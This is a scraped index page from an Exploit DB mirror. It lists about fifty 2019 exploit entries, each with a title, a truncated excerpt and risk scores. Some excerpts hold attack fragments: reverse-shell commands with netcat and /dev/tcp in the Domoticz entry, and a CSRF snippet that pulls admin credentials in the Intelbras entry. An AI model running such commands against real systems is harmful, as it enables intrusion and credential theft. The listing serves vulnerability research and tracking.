Lucene search
K
ExploitdbRecent

47904 matches found

Exploit DB
Exploit DB
added 2019/05/06 12:0 a.m.95 views

LG Supersign EZ CMS - Remote Code Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'LG Supersign EZ CMS RCE', 'Description' = %q LG SuperSignEZ CMS, that many LG SuperSign TVs have builtin, is prone to remote code execution due to...

9.8CVSS7.4AI score0.56237EPSS
Exploits9
Exploit DB
Exploit DB
added 2019/05/06 12:0 a.m.145 views

iOS 12.1.3 - 'cfprefsd' Memory Corruption

// c 2019 ZecOps, Inc. - https://www.zecops.com - Find Attackers' Mistakes // Intended only for educational and defensive purposes only. // Use at your own risk. include import include include include include include define AGENT 1 define FILLDICTCOUNT 0x600 define FILLCOUNT 0x1000 define FREECOU...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/05/06 12:0 a.m.72 views

NSClient++ 0.5.2.35 - Privilege Escalation

Exploit Author: bzyo Twitter: @bzyo Exploit Title: NSClient++ 0.5.2.35 - Privilege Escalation Date: 05-05-19 Vulnerable Software: NSClient++ 0.5.2.35 Vendor Homepage: http://nsclient.org/ Version: 0.5.2.35 Software Link: http://nsclient.org/download/ Tested on: Windows 10 x64 Details: When...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/05/06 12:0 a.m.219 views

microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection

Sql Injection on microASP Portal+ CMS + Date: 05/05/2019 + Risk: High + CWE Number : CWE-89 + Author: Felipe Andrian Peixoto + Vendor Homepage: http://www.microasp.it/ + Contact: [email protected] + Tested on: Windows 7 and Gnu/Linux + Dork: inurl:"/pagina.phtml?explodetree" // use your...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/05/03 12:0 a.m.183 views

Microsoft Windows PowerShell ISE - Remote Code Execution

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS-POWERSHELL-ISE-FILENAME-PARSING-FLAW-RCE-0DAY.txt + ISR: ApparitionSec + Zero Day Initiative Program Vendor www.microsoft.com Product Windows PowerShell ISE The...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2019/05/03 12:0 a.m.61 views

Blue Angel Software Suite - Command Execution

Exploit Title: Blue Angel Software Suite - Authenticated Command Execution Google Dork: N/A Date: 02/05/2019 Exploit Author: Paolo Serracino Vendor Homepage: http://www.5vtechnologies.com Software Link: N/A Version: All Tested on: Embedded Linux OS CVE : N/A Description: Blue Angel Software Suite...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/05/03 12:0 a.m.138 views

SolarWinds DameWare Mini Remote Control 10.0 - Denial of Service

Vendor: Solarwinds Site Vendor: https://www.dameware.com/ Product: Dameware Mini Remote Control Version: 10.0 x64 Platform: Windows Tested on: Windows 7 SP1 x64 Dscription: The DWRCC executable file is affected by a buffer overflow vulnerability. The buffer size passed in on the machine name...

7.5CVSS7.6AI score0.20587EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/05/03 12:0 a.m.131 views

Instagram Auto Follow - Authentication Bypass

Exploit Title: Instagram Auto Follow - Autobot Instagram - Authentication Bypass Date: 2019-05-01 Exploit Author: Veyselxan Vendor Homepage: https://codecanyon.net/item/instagram-auto-follow-autobot-instagram/23720743?srank=4 Tested on: Linux https://eowynlab.cf/autobot-follow/index.php username:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/05/03 12:0 a.m.167 views

Crestron AM/Barco wePresent WiPG/Extron ShareLink/Teq AV IT/SHARP PN-L703WA/Optoma WPS-Pro/Blackbox HD WPS/InFocus LiteShow - Remote Command Injection

Exploit Title: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection Date: 05/01/2019 Exploit Author: Jacob Baines Tested on: Crestron AM-100 1.6.0.2 CVE : CVE-2019-3929 PoC Video: https://www.youtube.com/watch?v=q-PIjnPcu2k Advisory:...

10CVSS9.6AI score0.98952EPSS
Exploits10
Exploit DB
Exploit DB
added 2019/05/03 12:0 a.m.174 views

WordPress Plugin Social Warfare < 3.5.3 - Remote Code Execution

Title: RCE in Social Warfare Plugin Wordpress =3D3.5.2 Date: March, 2019 Researcher: Luka Sikic Exploit Author: hash3liZer Download Link: https://wordpress.org/plugins/social-warfare/ Reference:...

6.1CVSS6.6AI score0.73543EPSS
Exploits20
Exploit DB
Exploit DB
added 2019/05/03 12:0 a.m.123 views

Zotonic < 0.47.0 mod_admin - Cross-Site Scripting

Exploit Title: Zotonic prompt‘XSS’ Affected source code file zotonicmodadmin: - zotonicmodadminidentity\priv\templates\adminsortheader.tpl - zotonicmodadminidentity\priv\templates\adminusers.tpl References http://docs.zotonic.com/en/latest/developer-guide/releasenotes/rel0.47.0.html...

4.8CVSS5.1AI score0.02532EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/05/02 12:0 a.m.144 views

Ruby On Rails - DoubleTap Development Mode secret_key_base Remote Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Ruby On Rails DoubleTap Development Mode secretkeybase Vulnerability', 'Description' = %q This module exploits a vulnerability in Ruby on Rails. ...

9.8CVSS9.8AI score0.92144EPSS
Exploits13
Exploit DB
Exploit DB
added 2019/05/01 12:0 a.m.200 views

CentOS Web Panel 0.9.8.793 (Free) / v0.9.8.753 (Pro) / 0.9.8.807 (Pro) - Domain Field (Add DNS Zone) Cross-Site Scripting

Exploit Title: CentOS Web Panel - Domain Field Add DNS Zone Cross-Site Scripting Vulnerability Google Dork: N/A Date: 22 - April - 2019 Exploit Author: DKM Vendor Homepage: http://centos-webpanel.com Software Link: http://centos-webpanel.com Version: v0.9.8.793 Free, v0.9.8.753 Pro and 0.9.8.807...

4.8CVSS5.2AI score0.05907EPSS
Exploits4
Exploit DB
Exploit DB
added 2019/04/30 12:0 a.m.43 views

HumHub 1.3.12 - Cross-Site Scripting

Exploit Title: HumHub 1.3.12 - Cross-Site Scripting Exploit Author: Kağan EĞLENCE Vendor Homepage: https://humhub.org/ Version: 1.3.12 CVE : CVE-2019-11564 Url : http://localhost/humhub-1.3.12/protected/vendor/codeception/codeception/tests/data/app/view/index.php Vulnerable File :...

6.1CVSS6.3AI score0.02627EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/04/30 12:0 a.m.64 views

Domoticz 4.10577 - Unauthenticated Remote Command Execution

!/usr/bin/env python -- coding: utf-8 -- Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse import requests import urllib import base64 import json impo...

9.8CVSS8.7AI score0.1727EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/04/30 12:0 a.m.36 views

Freefloat FTP Server 1.0 - 'STOR' Remote Buffer Overflow

Exploit Title: Free Float FTP 1.0 "STOR" Remote Buffer Overflow Google Dork: N/A Date: 4/26/2019 Exploit Author: Kevin Randall Vendor Homepage: Software Link: http://www.freefloat.com/software/freefloatftpserver.zip Version: Firmware: Free Float FTP 1.0 Tested on: Windows XP Professional Service...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/04/30 12:0 a.m.59 views

Spring Cloud Config 2.1.x - Path Traversal (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Spring Cloud Config Server Directory Traversal', 'Description' = %q This module exploits an unauthenticated directory traversal vulnerability whi...

6.5CVSS6.7AI score0.85295EPSS
Exploits6
Exploit DB
Exploit DB
added 2019/04/30 12:0 a.m.62 views

Intelbras IWR 3000N - Denial of Service (Remote Reboot)

/bin/bash PoC based on CVE-2019-11415 created by Social Engineering Neo. Credit: https://1.337.zone/2019/04/08/intelbras-iwr-3000n-any-version-dos-on-malformed-login-request/ A malformed login request allows remote attackers to cause a denial of service reboot, as demonstrated by JSON misparsing ...

7.8CVSS7.6AI score0.13743EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/04/30 12:0 a.m.33 views

Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-Site Scripting

Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting Stored XSS Exploit Author: Seyed Sadegh Khatami Website: https://www.cert.ir Date: 2019-04-27 Google Dork: N/A Vendor Homepage: https://www.veeam.com/ Software Link: https://www.veeam.com/virtual-server-management-one-free.html...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/04/30 12:0 a.m.36 views

Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-site Scripting (Add/Edit Widget)

Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting Add/Edit Widget Exploit Author: Seyed Sadegh Khatami Website: https://www.cert.ir Date: 2019-04-27 Google Dork: N/A Vendor Homepage: https://www.veeam.com/ Software Link: https://www.veeam.com/virtual-server-management-one-free.html...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/04/30 12:0 a.m.47 views

Joomla! Component ARI Quiz 3.7.4 - SQL Injection

Exploit Title: Joomla! Component ARI Quiz 3.7.4 - SQL Injection Exploit Author: Mr Winst0n Author E-mail: [email protected] Discovery Date: April 27, 2019 Vendor Homepage: http://www.ari-soft.com Software Link :...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/04/30 12:0 a.m.56 views

Netgear DGN2200 / DGND3700 - Admin Password Disclosure

/bin/bash PoC based on CVE-2016-5649 created by Social Engineering Neo. Long Method: https://www.youtube.com/watch?v=f3awG0XPKAs https://www.shodan.io/search?query=DGN2200 = 2,325 possible vulnerable devices. https://www.shodan.io/search?query=DGND3700 = 555 possible vulnerable devices. A...

9.8CVSS9.6AI score0.27215EPSS
Exploits6
Exploit DB
Exploit DB
added 2019/04/30 12:0 a.m.38 views

Pimcore < 5.71 - Unserialize Remote Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Pimcore Unserialize RCE", 'Description' = %q This module exploits a PHP unserialize in Pimcore before 5.7.1 to execute arbitrary code. An...

8.8CVSS7.4AI score0.69356EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/04/30 12:0 a.m.39 views

Veeam ONE Reporter 9.5.0.3201 - Multiple Cross-Site Request Forgery

Exploit Title: Veeam ONE Reporter - Cross-Site Request Forgery All Actions/Methods Exploit Author: Seyed Sadegh Khatami Website: https://www.cert.ir Date: 2019-04-27 Google Dork: N/A Vendor Homepage: https://www.veeam.com/ Software Link: https://www.veeam.com/virtual-server-management-one-free.ht...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/04/30 12:0 a.m.28 views

Freefloat FTP Server 1.0 - 'SIZE' Remote Buffer Overflow

Exploit Title: Free Float FTP 1.0 "SIZE" Remote Buffer Overflow Google Dork: N/A Date: 4/26/2019 Exploit Author: Kevin Randall Vendor Homepage: Software Link: http://www.freefloat.com/software/freefloatftpserver.zip Version: Firmware: Free Float FTP 1.0 Tested on: Windows XP Professional Service...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/04/30 12:0 a.m.973 views

Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution

!/usr/bin/python Exploit Title: Oracle Weblogic Exploit CVE-2019-2725 Date: 30/04/2019 Exploit Author: Avinash Kumar Thapa Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html Version: Oracl...

9.8CVSS9AI score0.99964EPSS
Exploits35
Exploit DB
Exploit DB
added 2019/04/30 12:0 a.m.62 views

AIS logistics ESEL-Server - Unauthenticated SQL Injection Remote Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'AIS logistics ESEL-Server Unauth SQL Injection RCE', 'Description' = %q This module will execute an arbitrary payload on an "ESEL" server used by...

9.8CVSS7.4AI score0.6585EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/04/30 12:0 a.m.61 views

Joomla! Component JiFile 2.3.1 - Arbitrary File Download

Exploit Title: Joomla! Component JiFile 2.3.1 - Arbitrary File Download Exploit Author: Mr Winst0n Author E-mail: [email protected] Discovery Date: April 28, 2019 Vendor Homepage: http://www.isapp.it Software Link :...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/04/30 12:0 a.m.66 views

Moodle 3.6.3 - 'Install Plugin' Remote Command Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Moodle 3.6.3 - 'Install Plugin' Remote Command Execution", 'Description' = %q This module exploits a command execution vulnerability in Moodle...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/04/30 12:0 a.m.40 views

DeviceViewer 3.12.0.1 - 'user' SEH Overflow

Exploit Title: DeviceViewer v3.12.0.1 username field SEH overflow PoC Discovery Date: 25/04/2019 Exploit Author: Hayden Wright Vendor Homepage: www.sricam.com/ Software Link: http://download.sricam.com/Manual/DeviceViewer.exe Version: v3.12.0.1 Tested on: Windows XP Pro x64, Windows 7 32bit CVE :...

7AI score
Exploits3
Exploit DB
Exploit DB
added 2019/04/30 12:0 a.m.36 views

Agent Tesla Botnet - Information Disclosure

Exploit Title: Agent Tesla Botnet - Information Disclosure Disclosure Vulnerability Google Dork: n/a Date: 26/11/2018 Exploit Author: n4pst3r Vendor Homepage: unkn0wn Software Link: http://www.agenttesla.com/ ¡ Down ! Version: unkn0wn Tested on: Windows 10, debian 7 CVE : n/a Greetz: Shell.root,...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/04/30 12:0 a.m.33 views

SpotAuditor 5.2.6 - 'Name' Denial of Service (PoC)

Exploit Title: SpotAuditor 5.2.6 - 'Name' Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-27 Vendor Homepage: www.nsauditor.com Software Link: http://spotauditor.nsauditor.com/downloads/spotauditorsetup.exe Tested Version: 5.2.6 Tested on: Windows Windows 10 Single...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/04/30 12:0 a.m.43 views

Hyvikk Fleet Manager - Shell Upload

======================================================================================== | Fleet Manager hyvikk Shell Upload Date: 29-04-2019 Title : Fleet Manager by hyvikk All versions | Author : saxgy1331 - Kaieteur-Falls-1331 | Vendor Homepage: https://codecanyon.net/item/fleet-manager/200518...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/04/30 12:0 a.m.87 views

Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification

elfcoredump has a comment back from something like 2.5.43-C3 that says: / We no longer stop all VM operations. This is because those proceses that could possibly change mapcount or the mmap / vma pages are now blocked in doexit on current finishing this core dump. Only ptrace can touch these memo...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/04/30 12:0 a.m.68 views

Intelbras IWR 3000N 1.5.0 - Cross-Site Request Forgery

IWR 3000N - CSRF on authenticated administrator Exploit! Click the button to get the login and password. function exploit $.get "http://localhost:80/v1/system/user" .done data = alert data ; .failfunction err, status alert status ; ;...

9.3CVSS8.9AI score0.0389EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/04/26 12:0 a.m.105 views

NSauditor 3.1.2.0 - 'Name' Denial of Service (PoC)

Exploit Title: NSauditor 3.1.2.0 - 'Name' Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-24 Vendor Homepage: www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/nsauditorsetup.exe Tested Version: 3.1.2.0 Tested on: Windows 7 x64 Service Pack 1 Steps t...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/04/26 12:0 a.m.381 views

Apache Pluto 3.0.0 / 3.0.1 - Persistent Cross-Site Scripting

Exploit Title: Stored XSS Date: 25-04-2019 Exploit Author: Dhiraj Mishra Vendor Homepage: https://portals.apache.org/pluto Software Link: https://portals.apache.org/pluto/download.html Version: 3.0.0, 3.0.1 Tested on: Ubuntu 16.04 LTS CVE: CVE-2019-0186 References:...

6.1CVSS6.3AI score0.20649EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/04/26 12:0 a.m.259 views

systemd - DynamicUser can Create setuid Binaries when Assisted by Another Process

This bug report describes a bug in systemd that allows a service with DynamicUser in collaboration with another service or user to create a setuid binary that can be used to access its UID beyond the lifetime of the service. This bug probably has relatively low severity, given that there aren't...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/04/26 12:0 a.m.42 views

NSauditor 3.1.2.0 - 'Community' Denial of Service (PoC)

Exploit Title: NSauditor 3.1.2.0 - 'Community' Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-24 Vendor Homepage: www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/nsauditorsetup.exe Tested Version: 3.1.2.0 Tested on: Windows 7 x64 Service Pack 1...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/04/25 12:0 a.m.200 views

RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework TODO: add other non-payload files class MetasploitModule 'RARLAB WinRAR ACE Format Input Validation Remote Code Execution', 'Description' = %q In WinRAR versions prior t...

7.8CVSS7.4AI score0.96274EPSS
Exploits13
Exploit DB
Exploit DB
added 2019/04/25 12:0 a.m.45 views

osTicket 1.11 - Cross-Site Scripting / Local File Inclusion

Exploit Title: osTicket v1.11 - Cross-Site Scripting to Local File Inclusion Date: 09.04.2019 Exploit Author: Özkan Mustafa Akkuş AkkuS @ehakkus Contact: https://pentest.com.tr Vendor Homepage: https://osticket.com Software Link: https://github.com/osTicket/osTicket References:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/04/25 12:0 a.m.338 views

JioFi 4G M2S 1.0.2 - Denial of Service

Exploit Title: cgi-bin/qcmapwebcgi on JioFi 4G M2S 1.0.2 devices allows a DoS Hang via the mask POST parameter Exploit Author: Vikas Chaudhary Date: 21-01-2019 Vendor Homepage: https://www.jio.com/ Hardware Link:...

6.5CVSS6.5AI score0.04766EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/04/25 12:0 a.m.37 views

Lavavo CD Ripper 4.20 - 'License Activation Name' Buffer Overflow (SEH)

Exploit Title: Lavavo CD Ripper 4.20 Local Seh Exploit Date: 25.04.2019 Vendor Homepage:https://www.lavavosoftware.com Software Link: https://lavavo-cd-ripper.jaleco.com/download Exploit Author: Achilles Tested Version: 4.20 Tested on: Windows XP SP3 EN Windows 7 Sp1 x64 1.- Run python code :...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/04/25 12:0 a.m.110 views

JioFi 4G M2S 1.0.2 - 'mask' Cross-Site Scripting

Exploit Title: cgi-bin/qcmapwebcgi on JioFi 4G M2S 1.0.2 devices has XSS and HTML injection via the mask POST parameter. Exploit Author: Vikas Chaudhary Date: 21-01-2019 Vendor Homepage: https://www.jio.com/ Hardware Link:...

6.1CVSS6.3AI score0.03991EPSS
Exploits5
Exploit DB
Exploit DB
added 2019/04/25 12:0 a.m.70 views

Backup Key Recovery 2.2.4 - Denial of Service (PoC)

Exploit Title: Backup Key Recovery 2.2.4 - 'Name' Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-24 Vendor Homepage: www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/backeyrecoverysetup.exe Tested Version: 2.2.4 Tested on: Windows 7 x64 Service Pac...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/04/25 12:0 a.m.81 views

HeidiSQL 10.1.0.5464 - Denial of Service (PoC)

Exploit Title: HeidiSQL Portable 10.1.0.5464 - Denial of Service PoC Discovery by: Victor Mondragón Discovery Date: 2019-04-24 Vendor Homepage: https://www.heidisql.com/ Software Link: https://www.heidisql.com/downloads/releases/HeidiSQL10.164Portable.zip Tested Version: 10.1.0.5464 Tested on:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/04/25 12:0 a.m.28 views

AnMing MP3 CD Burner 2.0 - Denial of Service (PoC)

Exploit Title: AnMing MP3 CD Burner 2.0 Local Dos Exploit Date: 25.04.2019 Vendor Homepage:http://www.ddz1977.com/ Software Link: https://files.downloadnow.com/s/software/10/56/16/74/anmingsetup.zip?token=1556228877063f2dc0aed064ee5d13374d8509661c&fileName=anmingsetup.zip Exploit Author: Achilles...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/04/24 12:0 a.m.82 views

Google Chrome 72.0.3626.121 / 74.0.3725.0 - 'NewFixedDoubleArray' Integer Overflow

VULNERABILITY DETAILS https://cs.chromium.org/chromium/src/v8/src/heap/factory.cc?rcl=dd689541d3815d64b4b39f6a41603248c71aa00e&l=496 Handle Factory::NewFixedDoubleArrayint length, PretenureFlag pretenure DCHECKLE0, length; if length == 0 return emptyfixedarray; if length...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2019/04/24 12:0 a.m.98 views

VirtualBox 6.0.4 r128413 - COM RPC Interface Code Injection Host Privilege Escalation

VirtualBox: COM RPC Interface Code Injection Host EoP Platform: VirtualBox 6.0.4 r128413 x64 on Windows 10 1809 Class: Elevation of Privilege Summary: The hardened VirtualBox process on a Windows host doesn’t secure its COM interface leading to arbitrary code injection and EoP. Description: This...

8.8CVSS8.7AI score0.01619EPSS
Exploits4
Exploit DB
Exploit DB
added 2019/04/23 12:0 a.m.222 views

systemd - Lack of Seat Verification in PAM Module Permits Spoofing Active Session to polkit

As documented at , for any action, a polkit policy can specify separate levels of required authentication based on whether a client is: - in an active session on a local console - in an inactive session on a local console - or neither This is expressed in the policy using the elements "allowany",...

7.4AI score
Exploits0
Total number of security vulnerabilities47904